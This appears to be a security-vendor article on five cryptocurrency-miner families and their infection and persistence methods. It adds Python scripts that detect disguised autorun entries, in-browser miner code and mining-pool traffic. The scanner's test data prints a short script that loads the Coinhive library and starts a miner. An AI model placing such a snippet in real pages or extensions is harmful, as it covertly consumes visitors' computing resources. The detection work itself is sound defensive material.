Web-based scripts and downloaded viruses deliver cryptocurrency miners that take advantage of the available system resources. The criminal operators have resorted to making multiple versions with varied functionality. Our article lists the top 5 cryptocurrency miners that are actively attacking users on a global scale.
1. CoinHive Miner
The Coinhive makers advertise their product as a convenient method for web-based games or for providing "extras" to users who voluntarily (or unknowingly) run the script. The programmers present the miner as a way of providing in-game currency: users who run the code can earn the ability to remove ads, receive game credits, video streaming time and other services that may be limited for free or public accounts on web services. The Monero mining algorithm is designed to run well on consumer processors and graphics cards.
2. The WDF Miner
The WDF miner is another popular threat that is part of a Trojan instance that bears the same name. Once it has infiltrated the victim computer it installs itself in the Windows system folder. The WDF miner executable masks itself as an application called "NVIDIA Driver Profile Updater" and as "WDF Sound". This is a clever strategy, as a large share of desktop users have components made by NVIDIA.
The WDF miner is capable of launching processes of its own that consume the system resources, thus generating cryptocurrency for the hackers. As a result of the performance overload the system may stop responding at times, videos may stutter and applications may not run correctly.
In addition, the WDF miner delivers a Trojan instance which gives the attackers the ability to spy on the users in real time. The module is able to record their mouse movements and keystrokes as well. During the infection phase most Trojans also extract a lot of sensitive information from the compromised systems, such as: installed hardware components, software installers and user settings.
3. Minergate.Exe (Bazon Trojan)
Miner malware, including the Minergate instance, is usually delivered together with another virus. In this case the Bazon Trojan is the counterpart assigned to assist the miner in infecting the designated targets.
In the most common case the pair delivers the threat using email spam messages that rely on social engineering tricks. The widely used scenario of impersonating a famous company or a government institution is used to make the targets download and execute a file. It is disguised as a letter, invoice or another document that may be of interest to the user. A wide range of formats can carry the malware code, including rich text documents, presentations and spreadsheets.
When the files are opened, embedded scripts (macros) run that seek to infect the machine with the Minergate miner. The executable file, which is then loaded into memory, is copied to a system folder so that the instance cannot be removed manually by simply deleting the payload.
The Bazon Trojan component modifies Windows registry values so that the Minergate code is loaded every time the computer boots. It is able to extract sensitive information from the computers, including: system components, network status, stored account credentials, installed applications, etc.
4. WaterMiner Monero Miner
WaterMiner is a dangerous virus that has gained notoriety across the security community. A large-scale campaign was detected last month that impacted users worldwide. The worrying fact is that the operators behind the WaterMiner malware used a non-standard infection strategy. The dangerous code was found in gaming mods for famous games like the Grand Theft Auto series, distributed on gaming forums and communities.
The first versions were not detected by the majority of security products. As a consequence the compromised machines were fully exposed to the hackers. Once the first infections had taken place, an automated attack sequence was started. Based on hardcoded commands the engine can deliver several payloads at once, including the WaterMiner itself.
A total of 11 miner files are loaded into various temporary folders, which makes it very hard to manually remove the threat. WaterMiner uses the available computer resources to mine the Monero currency. It is possible that a Russian hacker or criminal collective is behind the infections.
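The three families above share host-side traits that a defender can check for: an executable disguised under an NVIDIA-sounding name (WDF), a copy dropped into the Windows system folder and started from a registry Run value (Minergate/Bazon), and payloads spread over temporary folders (WaterMiner). The following Python script is an added example, not code from the article or from any of the malware it describes; it runs a few such rules over a constructed Run-key and process inventory. The NVIDIA vendor folder and signer name it compares against are assumptions, and every path, name and CPU figure in the sample data is constructed.

```python
"""Triage autorun entries and running processes for the miner tricks the
article describes: a disguise borrowed from NVIDIA, a copy in a Windows
system folder started from a Run value, and payloads in temp folders.

Added example, not code from the article. The Run entries and process list
are constructed sample data; feed in your own inventory tooling's output on
a real host. The NVIDIA folder and signer strings are assumptions."""
import ntpath

TEMP_DIRS = (r"c:\windows\temp", r"c:\users\public")
TEMP_MARKER = r"\appdata\local\temp"            # per-user temp, any profile
WINDOWS_DIR = r"c:\windows"
NVIDIA_DIRS = (r"c:\program files\nvidia corporation",
               r"c:\program files (x86)\nvidia corporation")   # assumption
NVIDIA_SIGNER = "nvidia corporation"                            # assumption
MASQUERADE_NAMES = ("nvidia driver profile updater", "wdf sound")  # from the article
CPU_THRESHOLD = 80.0   # percent; sustained load typical of a miner


def _norm(path):
    return path.lower().replace("/", "\\")


def _in_dir(path, directory):
    return _norm(path).startswith(_norm(directory) + "\\")


def is_temp_location(path):
    """True when the image lives in a temp or public folder."""
    p = _norm(path)
    return TEMP_MARKER + "\\" in p or any(_in_dir(p, d) for d in TEMP_DIRS)


def image_from_command(command):
    """Pull the executable path out of a Run value such as '"C:\\a\\b.exe" /x'.
    Unquoted paths containing spaces are cut at the first space; that is
    good enough for triage."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def run_entries_to_images(entries):
    return [{"source": "run", "name": e["name"],
             "path": image_from_command(e["command"]),
             "signer": e.get("signer")} for e in entries]


def triage(images):
    """Return (source, name, file, reasons) for every image that trips a rule."""
    findings = []
    for img in images:
        reasons = []
        name = img["name"].lower()
        path = img["path"]
        signer = (img.get("signer") or "").lower()
        if name in MASQUERADE_NAMES:
            reasons.append("name matches a known WDF miner disguise")
        if "nvidia" in name and (signer != NVIDIA_SIGNER
                                 or not any(_in_dir(path, d) for d in NVIDIA_DIRS)):
            reasons.append("claims to be NVIDIA software but is not signed by "
                           "NVIDIA or not installed in the vendor folder")
        if is_temp_location(path):
            reasons.append("runs from a temporary or public folder")
        elif _in_dir(path, WINDOWS_DIR) and not signer:
            reasons.append("unsigned binary inside the Windows folder")
        if img.get("cpu", 0.0) >= CPU_THRESHOLD and not signer:
            reasons.append("unsigned process at %.0f%% CPU" % img["cpu"])
        if reasons:
            findings.append((img["source"], img["name"], ntpath.basename(path), reasons))
    return findings


# Constructed sample inventory (not real telemetry).
SAMPLE_RUN_ENTRIES = [
    {"name": "SecurityHealth", "signer": "Microsoft Windows",
     "command": r'"C:\Windows\system32\SecurityHealthSystray.exe"'},
    {"name": "NVIDIA Driver Profile Updater", "signer": None,
     "command": r'"C:\Windows\system32\wdfsound.exe" /background'},
    {"name": "Minergate", "signer": None,
     "command": r"C:\Users\Public\minergate.exe"},
]
SAMPLE_PROCESSES = [
    {"source": "process", "name": "NVIDIA Container", "cpu": 1.2,
     "path": r"C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe",
     "signer": "NVIDIA Corporation"},
    {"source": "process", "name": "WDF Sound", "cpu": 97.0,
     "path": r"C:\Windows\system32\wdfsound.exe", "signer": None},
    {"source": "process", "name": "chrome.exe", "cpu": 40.0,
     "path": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "signer": "Google LLC"},
    {"source": "process", "name": "svchost.exe", "cpu": 88.0,
     "path": r"C:\Users\alice\AppData\Local\Temp\x1\svchost.exe", "signer": None},
]


def sample_findings():
    return triage(run_entries_to_images(SAMPLE_RUN_ENTRIES) + SAMPLE_PROCESSES)


if __name__ == "__main__":
    for source, name, image, reasons in sample_findings():
        print(f"[{source}] {name} ({image}): " + "; ".join(reasons))
```

The rules deliberately stay coarse: a signed Microsoft binary in system32 passes, while anything unsigned in the Windows folder, anything started from a temp or public folder, and anything borrowing the NVIDIA name without NVIDIA's signature is reported for a human to look at.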
5. Browser Extension Cryptocurrency Miners
Computer hackers have started to bundle miner malware into counterfeit browser extensions. A recent example is the Quick Searcher CPU Miner, which was featured in the extension repositories of some of the most popular web browsers (such as Mozilla Firefox and Google Chrome). The malicious plugins can also be installed via infected software installers downloaded from hacked or hacker-operated download portals. It is believed that some of the versions associated with these add-ons use code from well-known instances such as Coinhive. At the onset of infection a series of prerequisite tasks can be executed to prepare the miner or deploy additional payloads (Trojans, adware or ransomware).
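The Coinhive section above and the extension case here come down to the same artefact: a script that loads the miner library and calls its API. The following Python scanner is an added example (not code from the article, from Coinhive or from any extension it names) that looks for those references in page HTML and in unpacked extension sources. The indicator strings are the publicly documented Coinhive script host and constructor names plus two generic mining strings; the page and extension samples are constructed.

```python
"""Flag in-browser miner code in web pages and extension sources.

Added example, not code from the article, Coinhive or any extension it
mentions. The indicator list names the Coinhive script host and its public
API entry points; extend it with your own threat intelligence. All sample
HTML and extension source below is constructed."""
from html.parser import HTMLParser
import re

SCRIPT_HOST_INDICATORS = ("coinhive.com",)
SOURCE_INDICATORS = (
    re.compile(r"CoinHive\.(Anonymous|User)\s*\(", re.I),  # miner constructors
    re.compile(r"coinhive\.min\.js", re.I),                # loader file name
    re.compile(r"\bcryptonight\b", re.I),                  # the Monero algorithm
    re.compile(r"stratum\+tcp://", re.I),                  # pool URL scheme
)


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def scan_source(text, origin):
    """Return (origin, matched_text) for every indicator found in JS text."""
    return [(origin, m.group(0)) for pat in SOURCE_INDICATORS
            for m in [pat.search(text)] if m]


def scan_html(html, origin="page"):
    """Scan a page: external script hosts first, then inline script bodies."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    hits = []
    for src in collector.srcs:
        if any(h in src.lower() for h in SCRIPT_HOST_INDICATORS) or scan_source(src, origin):
            hits.append((origin, "external script " + src))
    for body in collector.inline:
        hits += scan_source(body, origin)
    return hits


def scan_extension_files(files):
    """files maps a path inside the unpacked extension to its source text."""
    hits = []
    for path, text in files.items():
        hits += scan_source(text, path)
    return hits


# Constructed samples; the site key is a placeholder, not a real key.
SAMPLE_PAGE = """<html><head><title>Free streaming credits</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script></head>
<body><p>Watch for free while the page stays open.</p>
<script src="/static/player.js"></script></body></html>"""

CLEAN_PAGE = """<html><body><script src="/static/player.js"></script>
<script>console.log('ready');</script></body></html>"""

SAMPLE_EXTENSION = {
    "manifest.json": '{"name": "Quick Searcher", "version": "1.0"}',
    "background.js": (
        "importScripts('https://coinhive.com/lib/coinhive.min.js');\n"
        "var miner = new CoinHive.User('SITE_KEY_PLACEHOLDER', 'ext-user');\n"
        "miner.start();\n"),
}

if __name__ == "__main__":
    for origin, what in scan_html(SAMPLE_PAGE) + scan_extension_files(SAMPLE_EXTENSION):
        print(f"{origin}: {what}")
```

A content security policy or a DNS blocklist stops the external loader, but an extension or a page that ships the mining code inline needs the inline scan as well, which is why the scanner reports both script sources and script bodies.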
The Consequences of Cryptocurrency Miner Infections
Crypto miners are the latest hit in the hacker communities. They take advantage of the numerous infiltration strategies used by viruses. In most cases the miners themselves are not delivered stand-alone but rather as a secondary payload during the infection sequence of other viruses.
Notable exceptions are when hackers bundle them into web pages, ad networks or browser hijacker code. This is an intentional act. In other cases site administrators include the code in order to generate revenue; this can be interpreted as a sort of donation from the site visitors. A notable case was a Pirate Bay proxy site that included a miner on its home page. Whenever a visitor wanted to access the torrent tracker, their computer resources were used to run the software and thus generate revenue for the site operators.
The miners can also be delivered in mass infection strategies; the most popular case is the use of vulnerability exploits. A large-scale attack was initiated in May 2017 when hacker collectives launched a worldwide malware attack against unpatched Microsoft Windows web servers. The key feature of the miners is that they can be used to gain not only Bitcoin but also alternative currencies such as Monero or Ethereum.
As always, we urge computer users to rely on a trusted, quality security solution which is capable of protecting their systems and removing active infections with a few mouse clicks.
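Whatever the delivery vector, a miner has to talk to a pool, and that dialogue looks the same whether the payload arrived by macro, game mod or exploit. The following Python snippet is an added example, not from the article: it classifies constructed TCP payload samples by the JSON-RPC method names of the common pool protocols (Stratum v1 for Bitcoin-style pools, the CryptoNote login/job dialect used by Monero miners, and the eth_* calls used by Ethereum miners). The flow records, addresses and agent strings are constructed; the method names are the publicly documented ones.

```python
"""Spot mining-pool JSON-RPC dialogue in captured TCP payloads.

Added example, not from the article. Method names are the publicly
documented ones for each pool protocol; the flow records are constructed
(TEST-NET addresses, placeholder wallets)."""
import json

POOL_METHODS = {
    "mining.subscribe": "Stratum v1 (Bitcoin-style pool)",
    "mining.authorize": "Stratum v1 (Bitcoin-style pool)",
    "mining.submit":    "Stratum v1 (Bitcoin-style pool)",
    "login":            "CryptoNote stratum (Monero-style pool)",
    "getjob":           "CryptoNote stratum (Monero-style pool)",
    "eth_submitLogin":  "Ethereum stratum/ethproxy",
    "eth_getWork":      "Ethereum stratum/ethproxy",
    "eth_submitWork":   "Ethereum stratum/ethproxy",
}


def classify_payload(payload):
    """Return a protocol label if the first line is a pool JSON-RPC message."""
    first = payload.strip().splitlines()[0] if payload.strip() else ""
    try:
        msg = json.loads(first)
    except ValueError:          # not JSON at all (HTTP, TLS, binary ...)
        return None
    if not isinstance(msg, dict):
        return None
    method, params = msg.get("method"), msg.get("params")
    if method == "login":
        # 'login' alone is too generic; the CryptoNote dialect sends a params
        # object carrying both 'login' (the wallet) and 'pass'.
        if isinstance(params, dict) and {"login", "pass"} <= set(params):
            return POOL_METHODS[method]
        return None
    return POOL_METHODS.get(method)


def detect_mining_flows(flows):
    """Return (src, dst, dport, label) for every flow that opens like a pool session."""
    return [(f["src"], f["dst"], f["dport"], label)
            for f in flows
            for label in [classify_payload(f["payload"])] if label]


# Constructed flow records: first client payload of each TCP session.
SAMPLE_FLOWS = [
    {"src": "10.0.0.21", "dst": "203.0.113.5", "dport": 3333,
     "payload": '{"id":1,"jsonrpc":"2.0","method":"login","params":'
                '{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/0.0"}}\n'},
    {"src": "10.0.0.22", "dst": "198.51.100.7", "dport": 80,
     "payload": "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"},
    {"src": "10.0.0.23", "dst": "203.0.113.9", "dport": 8080,
     "payload": '{"id":1,"method":"mining.subscribe","params":["cpuminer/0.0"]}\n'},
    {"src": "10.0.0.24", "dst": "192.0.2.40", "dport": 443,
     "payload": '{"method":"login","params":{"user":"alice"}}\n'},   # ordinary app login
    {"src": "10.0.0.25", "dst": "203.0.113.12", "dport": 4444,
     "payload": '{"id":1,"method":"eth_submitLogin","params":["0xWALLET_PLACEHOLDER"]}\n'},
]

if __name__ == "__main__":
    for src, dst, dport, label in detect_mining_flows(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{dport}  {label}")
```

The port is deliberately not part of the rule: pools accept connections on 80, 443 and 8080 as readily as on 3333, so the method names in the first client message are the reliable signal, and the ordinary `login` call from a web application is kept out by requiring the wallet-and-password shape the CryptoNote dialect uses.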